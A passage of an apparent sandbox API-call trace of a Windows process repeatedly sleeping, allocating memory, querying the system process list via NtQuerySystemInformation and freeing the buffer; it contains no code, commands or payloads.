NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.562] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.562] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.564] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.564] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.567] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.568] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.570] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.571] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.571] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.574] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.575] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.577] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.581] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.581] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.583] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.584] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.584] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.587] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.588] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.589] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.590] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.591] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.595] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.595] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.597] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.601] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.602] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.603] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.604] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.609] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.610] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.615] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.616] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.617] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.618] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.622] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.623] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.624] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.625] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.625] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.625] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.628] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.629] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.630] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.631] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.631] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.635] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.636] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.638] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.638] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.642] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.642] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.643] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.648] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.648] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.652] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.653] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.656] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.660] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.661] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.663] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.663] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.664] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.671] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.672] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.674] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.675] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.680] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.680] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.683] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.684] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.684] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.689] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.690] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.692] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.693] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.698] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.699] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.700] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.702] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.702] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.707] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.708] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.710] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.710] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.711] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.711] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.716] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.717] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.718] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.719] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.719] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, 